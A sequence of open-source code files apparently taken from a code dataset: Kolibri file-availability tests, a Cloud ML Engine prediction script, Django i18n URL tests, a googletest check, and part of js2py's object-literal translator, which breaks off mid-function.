        self.createmock_content_file2()
        checksums = get_available_checksums_from_disk(
            test_channel_id, self.mock_drive_id
        )
        self.assertEqual(checksums, set([file_id_1, file_id_2]))

    @patch("kolibri.core.content.utils.file_availability.get_mounted_drive_by_id")
    def test_set_two_files_one_in_channel(self, drive_mock):
        DriveData = namedtuple("DriveData", ["id", "datafolder"])
        drive_mock.return_value = DriveData(
            id=self.mock_drive_id, datafolder=self.mock_home_dir
        )
        self.createmock_content_file1()
        self.createmock_content_file(uuid.uuid4().hex)
        checksums = get_available_checksums_from_disk(
            test_channel_id, self.mock_drive_id
        )
        self.assertEqual(checksums, set([file_id_1]))

    @patch("kolibri.core.content.utils.file_availability.get_mounted_drive_by_id")
    def test_set_two_files_none_in_channel(self, drive_mock):
        DriveData = namedtuple("DriveData", ["id", "datafolder"])
        drive_mock.return_value = DriveData(
            id=self.mock_drive_id, datafolder=self.mock_home_dir
        )
        self.createmock_content_file(uuid.uuid4().hex)
        self.createmock_content_file(uuid.uuid4().hex)
        checksums = get_available_checksums_from_disk(
            test_channel_id, self.mock_drive_id
        )
        self.assertEqual(checksums, set())

    def tearDown(self):
        shutil.rmtree(self.mock_home_dir)
        super(LocalFileByDisk, self).tearDown()
# Ids of all non-supplementary LocalFiles in the test channel; used below to
# verify that remotely reported checksums refer to real channel files.
local_file_qs = LocalFile.objects.filter(
    files__contentnode__channel_id=test_channel_id, files__supplementary=False
).values_list("id", flat=True)
@patch("kolibri.core.content.utils.sqlalchemybridge.get_engine", new=get_engine)
class LocalFileRemote(TransactionTestCase):
    """Tests for get_available_checksums_from_remote with the HTTP layer
    mocked out; the remote's integer payload determines which files are
    reported available."""

    fixtures = ["content_test.json"]

    def setUp(self):
        super(LocalFileRemote, self).setUp()
        process_cache.clear()
        self.location = NetworkLocation.objects.create(base_url="test")

    @patch("kolibri.core.content.utils.file_availability.requests")
    def test_set_one_file(self, requests_mock):
        # Payload "1" -> exactly one channel file reported available.
        requests_mock.post.return_value.status_code = 200
        requests_mock.post.return_value.content = "1"
        checksums = get_available_checksums_from_remote(
            test_channel_id, self.location.id
        )
        self.assertEqual(len(checksums), 1)
        self.assertTrue(local_file_qs.filter(id=list(checksums)[0]).exists())

    @patch("kolibri.core.content.utils.file_availability.requests")
    def test_set_two_files_in_channel(self, requests_mock):
        # Payload "3" -> both channel files reported available.
        requests_mock.post.return_value.status_code = 200
        requests_mock.post.return_value.content = "3"
        checksums = get_available_checksums_from_remote(
            test_channel_id, self.location.id
        )
        self.assertEqual(len(checksums), 2)
        self.assertTrue(local_file_qs.filter(id=list(checksums)[0]).exists())
        self.assertTrue(local_file_qs.filter(id=list(checksums)[1]).exists())

    @patch("kolibri.core.content.utils.file_availability.requests")
    def test_set_two_files_none_in_channel(self, requests_mock):
        # Payload "0" -> nothing available.
        requests_mock.post.return_value.status_code = 200
        requests_mock.post.return_value.content = "0"
        checksums = get_available_checksums_from_remote(
            test_channel_id, self.location.id
        )
        self.assertEqual(checksums, set())

    @patch("kolibri.core.content.utils.file_availability.requests")
    def test_404_remote_checksum_response(self, requests_mock):
        # An error status means "unknown", signalled as None (not empty set).
        requests_mock.post.return_value.status_code = 404
        checksums = get_available_checksums_from_remote(
            test_channel_id, self.location.id
        )
        self.assertIsNone(checksums)

    @patch("kolibri.core.content.utils.file_availability.requests")
    def test_invalid_integer_remote_checksum_response(self, requests_mock):
        # An unparseable payload is treated like an error response.
        requests_mock.post.return_value.status_code = 200
        requests_mock.post.return_value.content = "I am not a json, I am a free man!"
        checksums = get_available_checksums_from_remote(
            test_channel_id, self.location.id
        )
        self.assertIsNone(checksums)
| mit |
amygdala/tensorflow-workshop | workshop_sections/wide_n_deep/predict/predict_class.py | 1 | 2839 | from oauth2client.client import GoogleCredentials
from googleapiclient import discovery
from googleapiclient import errors
import json
class MLEngine:
    """Thin wrapper around the Google Cloud ML Engine discovery client.

    Builds the API client from application default credentials and exposes
    model listing and online prediction helpers that print their results.
    """

    def __init__(self, projectID='cloudml-demo', service='ml', version='v1'):
        self.projectID = projectID
        self.service = service
        self.version = version
        self.svc = self.make_svc()

    def make_svc(self):
        """Build and return the discovery client for the ML API."""
        # Get application default credentials (possible only if the gcloud tool is
        # configured on your machine).
        # gcloud auth application-default login
        credentials = GoogleCredentials.get_application_default()
        # Build a representation of the Cloud ML API.
        ml = discovery.build(self.service, self.version, credentials=credentials)
        return ml

    def models_list(self):
        """List the project's models, printing the response (or the error)."""
        print('models.list')
        request = self.svc.projects().models().list(
            parent='projects/{}'.format(self.projectID))  # , body=requestDict)
        # Make the call.
        try:
            response = request.execute()
            print(response)
        except errors.HttpError as err:
            # Something went wrong, print out some information.
            print('There was an error listing the model. Details:')
            print(err._get_reason())
            print(err)

    def model_predict(self, model, version):
        """Send the JSON-lines instances in ./test.json to |model| for
        online prediction, printing the response (or the error)."""
        print('models.predict')
        instances = []
        model_id = 'projects/{}/models/{}/versions/{}'.format(self.projectID, model, version)
        # NOTE(review): the versioned id above is immediately overwritten, so
        # |version| is effectively unused and the model's default version
        # serves the request -- confirm whether that is intentional.
        model_id = 'projects/{}/models/{}'.format(self.projectID, model)
        print(model_id)
        # One JSON instance per line.
        with open('test.json') as infile:
            for line in infile:
                instances.append(json.loads(line))
        request_body = {'instances': instances}
        request = self.svc.projects().predict(
            # parent=self.projectID,
            name=model_id,
            body=request_body
        )  # , body=requestDict)
        # Make the call.
        try:
            response = request.execute()
            print(response)
        except errors.HttpError as err:
            # Something went wrong, print out some information.
            print('There was an error listing the model. Details:')
            print(err._get_reason())
            print(err)
def make_models():
    """Exercise the deployed wide-n-deep model with a single predict call."""
    engine = MLEngine()
    engine.model_predict('cloudwnd', 'v1')
    return
if __name__ == "__main__":
    # Script entry point: run the single predict smoke-call.
    make_models()

# NOTE(review): everything below is dead sample code (a projects().models()
# create/list experiment) kept verbatim for reference -- consider deleting.
# Create a dictionary with the fields from the request body.
# requestDict = {'name': 'api_model1', 'description': 'a model from the python api'}
# Create a request to call projects.models.list.
# request = ml.svc.projects().models().list(
#     parent=ml.projectID) #, body=requestDict)
# # Make the call.
# try:
#     response = request.execute()
#     print(response)
# except errors.HttpError as err:
#     # Something went wrong, print out some information.
#     print('There was an error creating the model. Check the details:')
#     print(err._get_reason())
#     print(err)
| apache-2.0 |
fafaman/django | tests/i18n/patterns/tests.py | 256 | 14326 | from __future__ import unicode_literals
import os
from django.core.exceptions import ImproperlyConfigured
from django.core.urlresolvers import clear_url_caches, reverse, translate_url
from django.http import HttpResponsePermanentRedirect
from django.middleware.locale import LocaleMiddleware
from django.template import Context, Template
from django.test import SimpleTestCase, override_settings
from django.test.utils import override_script_prefix
from django.utils import translation
from django.utils._os import upath
class PermanentRedirectLocaleMiddleWare(LocaleMiddleware):
    # LocaleMiddleware variant that issues permanent (301) language
    # redirects instead of the default temporary ones; used by
    # URLRedirectTests.test_custom_redirect_class below.
    response_redirect_class = HttpResponsePermanentRedirect
# Shared i18n configuration for every URL test case in this module:
# three languages, LocaleMiddleware enabled, and the default test URLconf.
@override_settings(
    USE_I18N=True,
    LOCALE_PATHS=[
        os.path.join(os.path.dirname(upath(__file__)), 'locale'),
    ],
    LANGUAGE_CODE='en-us',
    LANGUAGES=[
        ('nl', 'Dutch'),
        ('en', 'English'),
        ('pt-br', 'Brazilian Portuguese'),
    ],
    MIDDLEWARE_CLASSES=[
        'django.middleware.locale.LocaleMiddleware',
        'django.middleware.common.CommonMiddleware',
    ],
    ROOT_URLCONF='i18n.patterns.urls.default',
    TEMPLATES=[{
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [os.path.join(os.path.dirname(upath(__file__)), 'templates')],
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.i18n',
            ],
        },
    }],
)
class URLTestCaseBase(SimpleTestCase):
    """
    TestCase base-class for the URL tests.
    """
    def setUp(self):
        # Make sure the cache is empty before we are doing our tests.
        clear_url_caches()

    def tearDown(self):
        # Make sure we will leave an empty cache for other testcases.
        clear_url_caches()
class URLPrefixTests(URLTestCaseBase):
    """
    Tests if the `i18n_patterns` is adding the prefix correctly.
    """
    def test_not_prefixed(self):
        # URLs outside i18n_patterns never get a language prefix.
        with translation.override('en'):
            self.assertEqual(reverse('not-prefixed'), '/not-prefixed/')
            self.assertEqual(reverse('not-prefixed-included-url'), '/not-prefixed-include/foo/')
        with translation.override('nl'):
            self.assertEqual(reverse('not-prefixed'), '/not-prefixed/')
            self.assertEqual(reverse('not-prefixed-included-url'), '/not-prefixed-include/foo/')

    def test_prefixed(self):
        # URLs inside i18n_patterns are prefixed with the active language.
        with translation.override('en'):
            self.assertEqual(reverse('prefixed'), '/en/prefixed/')
        with translation.override('nl'):
            self.assertEqual(reverse('prefixed'), '/nl/prefixed/')

    @override_settings(ROOT_URLCONF='i18n.patterns.urls.wrong')
    def test_invalid_prefix_use(self):
        # i18n_patterns is only allowed in the root URLconf.
        self.assertRaises(ImproperlyConfigured, lambda: reverse('account:register'))
@override_settings(ROOT_URLCONF='i18n.patterns.urls.disabled')
class URLDisabledTests(URLTestCaseBase):
    # When USE_I18N is off, i18n_patterns must not add any language prefix.
    @override_settings(USE_I18N=False)
    def test_prefixed_i18n_disabled(self):
        with translation.override('en'):
            self.assertEqual(reverse('prefixed'), '/prefixed/')
        with translation.override('nl'):
            self.assertEqual(reverse('prefixed'), '/prefixed/')
@override_settings(ROOT_URLCONF='i18n.patterns.urls.path_unused')
class PathUnusedTests(URLTestCaseBase):
    """
    Check that if no i18n_patterns is used in root urlconfs, then no
    language activation happens based on url prefix.
    """
    def test_no_lang_activate(self):
        # '/nl/' in the path must NOT activate Dutch here.
        response = self.client.get('/nl/foo/')
        self.assertEqual(response.status_code, 200)
        self.assertEqual(response['content-language'], 'en')
        self.assertEqual(response.context['LANGUAGE_CODE'], 'en')
class URLTranslationTests(URLTestCaseBase):
    """
    Tests if the pattern-strings are translated correctly (within the
    `i18n_patterns` and the normal `patterns` function).
    """
    def test_no_prefix_translated(self):
        # Translated patterns outside i18n_patterns: path changes, no prefix.
        with translation.override('en'):
            self.assertEqual(reverse('no-prefix-translated'), '/translated/')
            self.assertEqual(reverse('no-prefix-translated-slug', kwargs={'slug': 'yeah'}), '/translated/yeah/')

        with translation.override('nl'):
            self.assertEqual(reverse('no-prefix-translated'), '/vertaald/')
            self.assertEqual(reverse('no-prefix-translated-slug', kwargs={'slug': 'yeah'}), '/vertaald/yeah/')

        with translation.override('pt-br'):
            self.assertEqual(reverse('no-prefix-translated'), '/traduzidos/')
            self.assertEqual(reverse('no-prefix-translated-slug', kwargs={'slug': 'yeah'}), '/traduzidos/yeah/')

    def test_users_url(self):
        # Translated patterns inside i18n_patterns: prefix AND path change.
        with translation.override('en'):
            self.assertEqual(reverse('users'), '/en/users/')

        with translation.override('nl'):
            self.assertEqual(reverse('users'), '/nl/gebruikers/')
            self.assertEqual(reverse('prefixed_xml'), '/nl/prefixed.xml')

        with translation.override('pt-br'):
            self.assertEqual(reverse('users'), '/pt-br/usuarios/')

    def test_translate_url_utility(self):
        with translation.override('en'):
            # Unresolvable URLs are returned unchanged.
            self.assertEqual(translate_url('/en/non-existent/', 'nl'), '/en/non-existent/')
            self.assertEqual(translate_url('/en/users/', 'nl'), '/nl/gebruikers/')
            # Namespaced URL
            self.assertEqual(translate_url('/en/account/register/', 'nl'), '/nl/profiel/registeren/')
            # translate_url must not change the active language as a side effect.
            self.assertEqual(translation.get_language(), 'en')

        with translation.override('nl'):
            self.assertEqual(translate_url('/nl/gebruikers/', 'en'), '/en/users/')
            self.assertEqual(translation.get_language(), 'nl')
class URLNamespaceTests(URLTestCaseBase):
    """
    Tests if the translations are still working within namespaces.
    """
    def test_account_register(self):
        with translation.override('en'):
            self.assertEqual(reverse('account:register'), '/en/account/register/')

        with translation.override('nl'):
            self.assertEqual(reverse('account:register'), '/nl/profiel/registeren/')
class URLRedirectTests(URLTestCaseBase):
    """
    Tests if the user gets redirected to the right URL when there is no
    language-prefix in the request URL.
    """
    def test_no_prefix_response(self):
        # Non-prefixed URLs are served directly, no redirect.
        response = self.client.get('/not-prefixed/')
        self.assertEqual(response.status_code, 200)

    def test_en_redirect(self):
        response = self.client.get('/account/register/', HTTP_ACCEPT_LANGUAGE='en')
        self.assertRedirects(response, '/en/account/register/')

        response = self.client.get(response['location'])
        self.assertEqual(response.status_code, 200)

    def test_en_redirect_wrong_url(self):
        # Dutch path with English language preference: no match.
        response = self.client.get('/profiel/registeren/', HTTP_ACCEPT_LANGUAGE='en')
        self.assertEqual(response.status_code, 404)

    def test_nl_redirect(self):
        response = self.client.get('/profiel/registeren/', HTTP_ACCEPT_LANGUAGE='nl')
        self.assertRedirects(response, '/nl/profiel/registeren/')

        response = self.client.get(response['location'])
        self.assertEqual(response.status_code, 200)

    def test_nl_redirect_wrong_url(self):
        response = self.client.get('/account/register/', HTTP_ACCEPT_LANGUAGE='nl')
        self.assertEqual(response.status_code, 404)

    def test_pt_br_redirect(self):
        response = self.client.get('/conta/registre-se/', HTTP_ACCEPT_LANGUAGE='pt-br')
        self.assertRedirects(response, '/pt-br/conta/registre-se/')

        response = self.client.get(response['location'])
        self.assertEqual(response.status_code, 200)

    def test_pl_pl_redirect(self):
        # language from outside of the supported LANGUAGES list
        response = self.client.get('/account/register/', HTTP_ACCEPT_LANGUAGE='pl-pl')
        self.assertRedirects(response, '/en/account/register/')

        response = self.client.get(response['location'])
        self.assertEqual(response.status_code, 200)

    @override_settings(
        MIDDLEWARE_CLASSES=[
            'i18n.patterns.tests.PermanentRedirectLocaleMiddleWare',
            'django.middleware.common.CommonMiddleware',
        ],
    )
    def test_custom_redirect_class(self):
        # A custom response_redirect_class yields a 301 instead of 302.
        response = self.client.get('/account/register/', HTTP_ACCEPT_LANGUAGE='en')
        self.assertRedirects(response, '/en/account/register/', 301)
class URLVaryAcceptLanguageTests(URLTestCaseBase):
    """
    Tests that 'Accept-Language' is not added to the Vary header when using
    prefixed URLs.
    """
    def test_no_prefix_response(self):
        # Non-prefixed responses DO vary on Accept-Language.
        response = self.client.get('/not-prefixed/')
        self.assertEqual(response.status_code, 200)
        self.assertEqual(response.get('Vary'), 'Accept-Language')

    def test_en_redirect(self):
        # The language redirect must not carry a Vary header...
        response = self.client.get('/account/register/', HTTP_ACCEPT_LANGUAGE='en')
        self.assertRedirects(response, '/en/account/register/')
        self.assertFalse(response.get('Vary'))

        # ...and neither must the prefixed page it points to.
        response = self.client.get(response['location'])
        self.assertEqual(response.status_code, 200)
        self.assertFalse(response.get('Vary'))
class URLRedirectWithoutTrailingSlashTests(URLTestCaseBase):
    """
    Tests the redirect when the requested URL doesn't end with a slash
    (`settings.APPEND_SLASH=True`).
    """
    def test_not_prefixed_redirect(self):
        # CommonMiddleware's APPEND_SLASH kicks in with a permanent redirect.
        response = self.client.get('/not-prefixed', HTTP_ACCEPT_LANGUAGE='en')
        self.assertRedirects(response, '/not-prefixed/', 301)

    def test_en_redirect(self):
        response = self.client.get('/account/register', HTTP_ACCEPT_LANGUAGE='en', follow=True)
        # We only want one redirect, bypassing CommonMiddleware
        self.assertListEqual(response.redirect_chain, [('/en/account/register/', 302)])
        self.assertRedirects(response, '/en/account/register/', 302)

        response = self.client.get('/prefixed.xml', HTTP_ACCEPT_LANGUAGE='en', follow=True)
        self.assertRedirects(response, '/en/prefixed.xml', 302)
class URLRedirectWithoutTrailingSlashSettingTests(URLTestCaseBase):
    """
    Tests the redirect when the requested URL doesn't end with a slash
    (`settings.APPEND_SLASH=False`).
    """
    @override_settings(APPEND_SLASH=False)
    def test_not_prefixed_redirect(self):
        # Without APPEND_SLASH there is nothing to redirect to.
        response = self.client.get('/not-prefixed', HTTP_ACCEPT_LANGUAGE='en')
        self.assertEqual(response.status_code, 404)

    @override_settings(APPEND_SLASH=False)
    def test_en_redirect(self):
        # The language redirect still happens, preserving the missing slash.
        response = self.client.get('/account/register-without-slash', HTTP_ACCEPT_LANGUAGE='en')
        self.assertRedirects(response, '/en/account/register-without-slash', 302)

        response = self.client.get(response['location'])
        self.assertEqual(response.status_code, 200)
class URLResponseTests(URLTestCaseBase):
    """
    Tests if the response has the right language-code.
    """
    def test_not_prefixed_with_prefix(self):
        # Non-prefixed URLs must not resolve under a language prefix.
        response = self.client.get('/en/not-prefixed/')
        self.assertEqual(response.status_code, 404)

    def test_en_url(self):
        response = self.client.get('/en/account/register/')
        self.assertEqual(response.status_code, 200)
        self.assertEqual(response['content-language'], 'en')
        self.assertEqual(response.context['LANGUAGE_CODE'], 'en')

    def test_nl_url(self):
        response = self.client.get('/nl/profiel/registeren/')
        self.assertEqual(response.status_code, 200)
        self.assertEqual(response['content-language'], 'nl')
        self.assertEqual(response.context['LANGUAGE_CODE'], 'nl')

    def test_wrong_en_prefix(self):
        # Translated path must match the prefix's language.
        response = self.client.get('/en/profiel/registeren/')
        self.assertEqual(response.status_code, 404)

    def test_wrong_nl_prefix(self):
        response = self.client.get('/nl/account/register/')
        self.assertEqual(response.status_code, 404)

    def test_pt_br_url(self):
        response = self.client.get('/pt-br/conta/registre-se/')
        self.assertEqual(response.status_code, 200)
        self.assertEqual(response['content-language'], 'pt-br')
        self.assertEqual(response.context['LANGUAGE_CODE'], 'pt-br')
class URLRedirectWithScriptAliasTests(URLTestCaseBase):
    """
    #21579 - LocaleMiddleware should respect the script prefix.
    """
    def test_language_prefix_with_script_prefix(self):
        prefix = '/script_prefix'
        with override_script_prefix(prefix):
            response = self.client.get('/prefixed/', HTTP_ACCEPT_LANGUAGE='en', SCRIPT_NAME=prefix)
            # target_status_code=404: the test client cannot actually serve
            # the script-prefixed target; only the redirect URL matters here.
            self.assertRedirects(response, '%s/en/prefixed/' % prefix, target_status_code=404)
class URLTagTests(URLTestCaseBase):
    """
    Test if the language tag works.
    """
    def test_strings_only(self):
        # Literal language codes inside {% language %} blocks.
        t = Template("""{% load i18n %}
            {% language 'nl' %}{% url 'no-prefix-translated' %}{% endlanguage %}
            {% language 'pt-br' %}{% url 'no-prefix-translated' %}{% endlanguage %}""")
        self.assertEqual(t.render(Context({})).strip().split(),
                         ['/vertaald/', '/traduzidos/'])

    def test_context(self):
        # Language codes supplied through template context variables.
        ctx = Context({'lang1': 'nl', 'lang2': 'pt-br'})
        tpl = Template("""{% load i18n %}
            {% language lang1 %}{% url 'no-prefix-translated' %}{% endlanguage %}
            {% language lang2 %}{% url 'no-prefix-translated' %}{% endlanguage %}""")
        self.assertEqual(tpl.render(ctx).strip().split(),
                         ['/vertaald/', '/traduzidos/'])

    def test_args(self):
        # {% url %} with positional arguments inside a language block.
        tpl = Template("""{% load i18n %}
            {% language 'nl' %}{% url 'no-prefix-translated-slug' 'apo' %}{% endlanguage %}
            {% language 'pt-br' %}{% url 'no-prefix-translated-slug' 'apo' %}{% endlanguage %}""")
        self.assertEqual(tpl.render(Context({})).strip().split(),
                         ['/vertaald/apo/', '/traduzidos/apo/'])

    def test_kwargs(self):
        # {% url %} with keyword arguments inside a language block.
        tpl = Template("""{% load i18n %}
            {% language 'nl' %}{% url 'no-prefix-translated-slug' slug='apo' %}{% endlanguage %}
            {% language 'pt-br' %}{% url 'no-prefix-translated-slug' slug='apo' %}{% endlanguage %}""")
        self.assertEqual(tpl.render(Context({})).strip().split(),
                         ['/vertaald/apo/', '/traduzidos/apo/'])
| bsd-3-clause |
bhargavipatel/808X_VO | vendor/googletest/googletest/test/gtest_uninitialized_test.py | 372 | 2482 | #!/usr/bin/env python
#
# Copyright 2008, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Verifies that Google Test warns the user when not initialized properly."""
__author__ = 'wan@google.com (Zhanyong Wan)'
import gtest_test_utils
# Path to the gtest_uninitialized_test_ binary built alongside this script.
COMMAND = gtest_test_utils.GetTestExecutablePath('gtest_uninitialized_test_')
def Assert(condition):
  """Raises AssertionError when |condition| is falsy."""
  if condition:
    return
  raise AssertionError
def AssertEq(expected, actual):
  """Raises AssertionError (after printing both values) unless
  expected == actual."""
  if expected == actual:
    return
  print('Expected: %s' % (expected,))
  print(' Actual: %s' % (actual,))
  raise AssertionError
def TestExitCodeAndOutput(command):
  """Runs the given command and verifies its exit code and output."""

  # Verifies that 'command' exits with code 1.
  p = gtest_test_utils.Subprocess(command)
  Assert(p.exited)
  AssertEq(1, p.exit_code)
  # The binary's diagnostic must tell the user to call InitGoogleTest.
  Assert('InitGoogleTest' in p.output)
class GTestUninitializedTest(gtest_test_utils.TestCase):
  """Runs the uninitialized-gtest binary and checks its diagnostics."""

  def testExitCodeAndOutput(self):
    TestExitCodeAndOutput(COMMAND)
if __name__ == '__main__':
  # Run under gtest's Python test harness.
  gtest_test_utils.Main()
| mit |
JackDandy/SickGear | lib/js2py/legecy_translators/objects.py | 4 | 11454 | """ This module removes all objects/arrays from JS source code and replace them with LVALS.
Also it has a function translating removed object/array to python code.
Use this module just after removing constants. Later move on to removing functions"""
from __future__ import print_function
# Name templates for the lvalue placeholders that replace removed
# object / array literals; %d is a sequential counter.
OBJECT_LVAL = 'PyJsLvalObject%d_'
ARRAY_LVAL = 'PyJsLvalArray%d_'
from utils import *
from jsparser import *
from nodevisitor import exp_translator
import functions
from flow import KEYWORD_METHODS
def FUNC_TRANSLATOR(*a):  # stupid import system in python
    # Placeholder; the real translator is installed at runtime via
    # set_func_translator() to break a circular import.
    raise RuntimeError('Remember to set func translator. Thank you.')
def set_func_translator(ftrans):
    """Install |ftrans| as the module's function translator.

    Replaces the raising FUNC_TRANSLATOR placeholder; exists to break the
    circular import between this module and the function translator.
    """
    # stupid stupid Python or Peter
    global FUNC_TRANSLATOR
    FUNC_TRANSLATOR = ftrans
def is_empty_object(n, last):
    """Decide whether empty braces are an empty object literal.

    |n| is the text between the braces, |last| the code preceding them.
    Braces with content are never *empty* objects; otherwise the decision
    is made from what came before: after ')' or ';' (or at the very start)
    the braces are an empty code block, not an object.
    """
    if n.strip():
        return False
    tail = last.strip()
    if not tail:
        return False
    return tail[-1] not in (')', ';')
# todo refine this function
def is_object(n, last):
    """n may be the inside of block or object.
    last is the code before object.

    Heuristically decides whether '{n}' is an object literal (True) or a
    code block (False), by checking every comma-separated element looks
    like a key:value pair or a get/set property.
    """
    if is_empty_object(n, last):
        return True
    if not n.strip():
        return False
    # Object contains lines of code so it cant be an object
    if len(argsplit(n, ';')) > 1:
        return False
    cands = argsplit(n, ',')
    if not cands[-1].strip():
        return True  # {xxxx,} empty after last , it must be an object
    for cand in cands:
        cand = cand.strip()
        # separate each candidate element at : in dict and check whether they are correct...
        kv = argsplit(cand, ':')
        if len(
                kv
        ) > 2:  # set the len of kv to 2 because of this stupid : expression
            # Re-join everything after the first ':' as the value part.
            kv = kv[0], ':'.join(kv[1:])
        if len(kv) == 2:
            # key value pair, check whether not label or ?:
            k, v = kv
            if not is_lval(k.strip()):
                return False
            v = v.strip()
            if v.startswith('function'):
                # Method values are always legal in an object.
                continue
            # will fail on label... {xxx: while {}}
            if v[0] == '{':  # value cant be a code block
                return False
            for e in KEYWORD_METHODS:
                # if v starts with any statement then return false
                if v.startswith(e) and len(e) < len(v) and v[len(
                        e)] not in IDENTIFIER_PART:
                    return False
        elif not (cand.startswith('set ') or cand.startswith('get ')):
            # Not key:value and not a getter/setter property -> not an object.
            return False
    return True
def is_array(last):
    """Decide whether a '[' following code |last| opens an array literal
    (True) rather than a property-access subscript (False)."""
    # it can be prop getter
    last = last.strip()
    # After these keywords a '[' must start a literal.
    if any(
            endswith_keyword(last, e) for e in
            {'return', 'new', 'void', 'throw', 'typeof', 'in', 'instanceof'}):
        return True
    # After ')' / ']' or an identifier character, '[' is a subscript.
    markers = {')', ']'}
    return not last or not (last[-1] in markers or last[-1] in IDENTIFIER_PART)
def remove_objects(code, count=1):
    """ This function replaces objects with OBJECT_LVALs, returns new code, replacement dict and count.
        count arg is the number that should be added to the LVAL of the first replaced object
    """
    replacements = {}  # replacement dict
    br = bracket_split(code, ['{}', '[]'])
    res = ''
    last = ''
    for e in br:
        # test whether e is an object
        if e[0] == '{':
            # Recurse first so nested objects inside e are handled either way.
            n, temp_rep, cand_count = remove_objects(e[1:-1], count)
            # if e was not an object then n should not contain any :
            if is_object(n, last):
                # e was an object: swap the whole literal for a fresh LVAL.
                res += ' ' + OBJECT_LVAL % count
                replacements[OBJECT_LVAL % count] = e
                count += 1
            else:
                # e was just a code block but could contain objects inside
                res += '{%s}' % n
                count = cand_count
                replacements.update(temp_rep)
        elif e[0] == '[':
            if is_array(last):
                res += e  # will be translated later
            else:  # prop get
                n, rep, count = remove_objects(e[1:-1], count)
                res += '[%s]' % n
                replacements.update(rep)
        else:  # e does not contain any objects
            res += e
        last = e  # needed to test for this stupid empty object
    return res, replacements, count
def remove_arrays(code, count=1):
    """Replace array literals in *code* with ARRAY_LVAL placeholders.

    Returns (new_code, replacement_dict, count).
    *NOTE* has to be called AFTER remove_objects."""
    pieces = []
    prev = ''
    replacements = {}
    for chunk in bracket_split(code, ['[]']):
        if chunk[0] == '[':
            if is_array(prev):
                placeholder = ARRAY_LVAL % count
                pieces.append(' ' + placeholder)
                replacements[placeholder] = chunk
                count += 1
            else:
                # subscript/property access - but it may still contain a true
                # array inside, e.g. a[['d'][3]] has 2 pseudo and 1 true array
                inner, inner_reps, count = remove_arrays(chunk[1:-1], count)
                pieces.append('[%s]' % inner)
                replacements.update(inner_reps)
        else:
            pieces.append(chunk)
        prev = chunk
    return ''.join(pieces), replacements, count
def translate_object(obj, lval, obj_count=1, arr_count=1):
    """Translate the JS object literal *obj* (with its braces) into Python
    source that assigns the constructed object to *lval*.

    Nested object/array literals and inline functions are extracted and
    translated separately; their definitions are prepended so they exist
    before the object that references them.
    Returns (python_code, obj_count, arr_count) with updated counters.
    """
    obj = obj[1:-1]  # remove {} from both ends
    obj, obj_rep, obj_count = remove_objects(obj, obj_count)
    obj, arr_rep, arr_count = remove_arrays(obj, arr_count)
    # Functions can be defined inside objects; the expression translator
    # cannot handle them, so pull them out and translate with the function
    # translator (same approach as in translate_array).
    obj, hoisted, inline = functions.remove_functions(obj, all_inline=True)
    assert not hoisted
    gsetters_after = ''  # define_own_property calls for getters/setters
    keys = argsplit(obj)
    res = []
    for i, e in enumerate(keys, 1):
        e = e.strip()
        if e.startswith('set '):
            gsetters_after += translate_setter(lval, e)
        elif e.startswith('get '):
            gsetters_after += translate_getter(lval, e)
        elif ':' not in e:
            # a trailing comma is legal only after the last element: {3:2,}
            if i < len(keys):
                raise SyntaxError('Unexpected "," in Object literal')
            break
        else:  # plain key: value pair (not getter, setter or elision)
            spl = argsplit(e, ':')
            if len(spl) < 2:
                raise SyntaxError('Invalid Object literal: ' + e)
            try:
                key, value = spl
            except ValueError:  # len(spl) > 2: the value itself contains ':'
                print('Unusual case ' + repr(e))
                key = spl[0]
                value = ':'.join(spl[1:])
            key = key.strip()
            if is_internal(key):
                # computed key - evaluate it at runtime via to_string()
                key = '%s.to_string().value' % key
            else:
                key = repr(key)
            value = exp_translator(value)
            if not value:
                raise SyntaxError('Missing value in Object literal')
            res.append('%s:%s' % (key, value))
    res = '%s = Js({%s})\n' % (lval, ','.join(res)) + gsetters_after
    # Translate the nested literals/functions removed earlier; their
    # definitions must appear BEFORE the code that references them.
    for nested_name, nested_info in inline.iteritems():  # functions
        nested_block, nested_args = nested_info
        new_def = FUNC_TRANSLATOR(nested_name, nested_block, nested_args)
        res = new_def + res
    for nested_lval, nested_obj in obj_rep.iteritems():  # objects
        new_def, obj_count, arr_count = translate_object(
            nested_obj, nested_lval, obj_count, arr_count)
        res = new_def + res
    for nested_lval, nested_arr in arr_rep.iteritems():  # arrays
        new_def, obj_count, arr_count = translate_array(
            nested_arr, nested_lval, obj_count, arr_count)
        res = new_def + res
    return res, obj_count, arr_count
def translate_setter(lval, setter):
    """Translate an object-literal setter ('set prop(v) {...}') into Python
    code that defines the setter function and registers it on *lval* via
    define_own_property."""
    func = 'function' + setter[3:]  # 'set prop(...)' -> 'function prop(...)'
    try:
        _, data, _ = functions.remove_functions(func)
        if not data or len(data) > 1:
            raise Exception()
    except Exception:
        # was a bare "except:" - narrowed so Ctrl-C/SystemExit still propagate
        raise SyntaxError('Could not parse setter: ' + setter)
    prop = data.keys()[0]
    body, args = data[prop]
